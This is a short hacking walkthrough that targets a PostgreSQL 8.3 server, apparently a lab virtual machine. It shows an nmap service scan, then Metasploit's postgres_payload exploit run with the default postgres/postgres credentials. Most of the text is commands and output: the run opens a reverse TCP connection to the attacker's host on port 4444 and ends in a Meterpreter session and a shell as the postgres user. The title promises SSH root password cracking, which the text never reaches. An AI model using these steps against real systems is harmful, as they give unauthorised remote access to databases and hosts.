STEPS TO HACK PostgreSQL DATABASE & CRACK SSH ROOT PASSWORD
===========================================================
1. NMAP SCAN TARGET
2. SEARCH FOR TARGETED SERVICE IN YOUR SCAN RESULT
3. START METASPLOIT CONSOLE AND DIVE INTO IT
**********************************************************************************

1. NMAP SCAN TARGET
====================
root@alice:~# nmap -sV -p5432,22 192.168.209.151
Starting Nmap 7.70 ( https://nmap.org ) at 2018-05-06 21:38 EDT
Nmap scan report for 192.168.209.151
Host is up (0.0019s latency).

PORT     STATE SERVICE    VERSION
22/tcp   open  ssh        OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
5432/tcp open  postgresql PostgreSQL DB 8.3.0 - 8.3.7
MAC Address: 00:0C:29:DA:D0:D3 (VMware)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 15.02 seconds

2. SEARCH FOR TARGETED SERVICE IN YOUR SCAN RESULT
==================================================
root@alice:~# nmap -sV -p5432,22 192.168.209.151 > postgresSCAN.txt
root@alice:~# egrep -i '(5432|22)' postgresSCAN.txt
22/tcp   open  ssh        OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
5432/tcp open  postgresql PostgreSQL DB 8.3.0 - 8.3.7
root@alice:~# 

3. START METASPLOIT CONSOLE AND DIVE INTO IT
============================================
msf auxiliary(scanner/postgres/postgres_login) > use exploit/linux/postgres/postgres_payload 
msf exploit(linux/postgres/postgres_payload) > show options

Module options (exploit/linux/postgres/postgres_payload):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   DATABASE  template1        yes       The database to authenticate against
   PASSWORD  postgres         no        The password for the specified username. Leave blank for a random password.
   RHOST                      yes       The target address
   RPORT     5432             yes       The target port
   USERNAME  postgres         yes       The username to authenticate as
   VERBOSE   false            no        Enable verbose output


Exploit target:

   Id  Name
   --  ----
   0   Linux x86


msf exploit(linux/postgres/postgres_payload) > set RHOST 192.168.209.151
RHOST => 192.168.209.151
msf exploit(linux/postgres/postgres_payload) > run

[*] Started reverse TCP handler on 192.168.209.179:4444 
[*] 192.168.209.151:5432 - PostgreSQL 8.3.1 on i486-pc-linux-gnu, compiled by GCC cc (GCC) 4.2.3 (Ubuntu 4.2.3-2ubuntu4)
[*] Uploaded as /tmp/OKkujksn.so, should be cleaned up automatically
[*] Sending stage (857352 bytes) to 192.168.209.151
[*] Meterpreter session 1 opened (192.168.209.179:4444 -> 192.168.209.151:33788) at 2018-05-06 23:33:48 -0400

meterpreter > shell
Process 20133 created.
Channel 1 created.

id
uid=108(postgres) gid=117(postgres) groups=114(ssl-cert),117(postgres)
whoami
postgres

